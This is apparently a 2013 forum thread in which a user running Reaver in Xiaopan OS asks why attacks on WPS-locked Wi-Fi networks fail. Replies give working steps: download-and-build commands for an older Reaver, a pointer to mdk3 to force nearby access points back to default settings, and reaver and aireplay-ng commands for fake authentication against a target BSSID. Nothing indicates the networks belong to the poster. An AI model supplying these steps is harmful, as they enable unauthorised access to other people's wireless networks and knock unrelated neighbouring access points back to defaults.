Hello guys , please help me I have this problem: WARNING: Failed to associate with XX:XX:XX:XX:XX (ESSID:????) I using this wireless card: TL-WN7200ND http://www.tp-link.com.au/products/details/?categoryid=&model=TL-WN7200ND#down On some networks it works perfectly, and on others it won't start at all. The signal strength of the network is about : -55 i run xiaopan 0451 with VWvare at Windows7 --- Double Post Merged, 27 Mar 2013 --- Now i know what is my problem. WPS is locked. Is there a way to use Reaver 1.4 ? --- Double Post Merged, 27 Mar 2013 ---
Try with reaver 1.3 For : Code: Select All cd /tmp/ wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz tar -xf reaver-1.3.tar.gz cd reaver-1.3/src/ cd src/ ./configure make make install
There is a way to unlock WPS...but make note of the following: All AP's around you will go back in default mode..(it can be good in a way) The tool is called mdk3..read this https://xiaopan.co/forums/posts/7837/
Anyone notice that that network he is attacking is not WPS enabled? I believe I locked a thread about this https://xiaopan.co/forums/threads/reaver-fails-to-associate-because-not-wps-enabled.3483/page-2
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX) [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX) [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX) [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX) [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX) "Not able to associate" For this, you can try associating yourself. So launch reaver with the -A option and do the following command: aireplay-ng -1 0 -b [target bssid] -h [your mac] [monitor interface] If the progress is really slow, you might want to look up the mac address of the target and see if you should use a delay for the attempts.